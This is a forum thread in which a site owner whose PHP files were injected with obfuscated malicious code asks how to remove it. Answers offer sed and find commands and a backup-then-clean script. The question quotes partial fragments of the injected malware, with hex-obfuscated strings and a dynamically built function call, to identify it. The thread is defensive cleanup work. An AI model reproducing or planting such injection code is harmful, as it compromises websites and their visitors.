Website hacked, how to remove malicious code with

Posted 2019-01-20 13:19

Question:

A website of mine is hacked. In every PHP file a line of code is added. I won't post the complete code here, but it starts with:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $yudqgxmnlr = 

and ends with:

 $gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>

I've tried finding and replacing with some ssh commands, but it doesn't seem to work. (Read: my lack of ssh knowledge gets in the way).

This is my latest attempt:

sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php

Can anyone help me?

Answer 1:

You can try this: https://github.com/daniyalahmadk/RMCI

You just need to put that code in the box and hit submit; it will search for the code in the files and remove it all at once.



Answer 2:

You need to add s/ at the start.

sed 's/<?php if(\!isset.*gzagexgpdc-1; ?>//g' *.php

OR

sed -r 's/<\?php if\(!isset.*gzagexgpdc-1; \?>//g' *.php

Add the -i parameter to save the changes made.



Answer 3:

This should work.

find . -name "*.php" -print0 | xargs -0 sed -ri '1s/^<\?php if\(!isset\(\$GLOBALS\[.*-1; \?>//'
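
A more cautious variant of the commands in the answers, as an added example that is not from any of the answerers: it first lists the files whose first line carries the injected block, then keeps a backup of each before stripping it. The function names, the `--clean` switch and the `.infected` backup suffix are assumptions of this example, and the signature assumes the `gzagexgpdc` variable name quoted in the question.

```shell
#!/bin/sh
# Added example (not from the original thread): list, back up, then clean
# PHP files whose first line starts with the injected block.
# SIG is built from the start/end markers quoted in the question; the random
# variable name (gzagexgpdc) must be adjusted to match your own infection.
SIG='^<\?php if\(!isset\(\$GLOBALS\[.*gzagexgpdc-1; \?>'

# Print every .php file under $1 whose first line matches SIG.
# (File names containing newlines are not handled.)
list_infected() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if head -n 1 "$f" | grep -Eq "$SIG"; then
            printf '%s\n' "$f"
        fi
    done
}

# Copy each infected file to <file>.infected, then strip the injected
# block from line 1 only, leaving the legitimate code that follows it.
clean_infected() {
    list_infected "$1" | while IFS= read -r f; do
        cp -p "$f" "$f.infected" || exit 1
        # -i.tmp works with both GNU and BSD sed; the temp copy is removed after.
        sed -E -i.tmp "1s/$SIG//" "$f" && rm -f "$f.tmp"
    done
}

# Usage: script DIR            -> dry run, only lists matching files
#        script DIR --clean    -> back up and clean them
if [ "$#" -gt 0 ]; then
    if [ "${2:-}" = "--clean" ]; then
        clean_infected "$1"
    else
        list_infected "$1"
    fi
fi
```

Review the dry-run list before cleaning, and move the `.infected` backups out of the web root once the cleaned files are verified.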


Tags: php ssh sed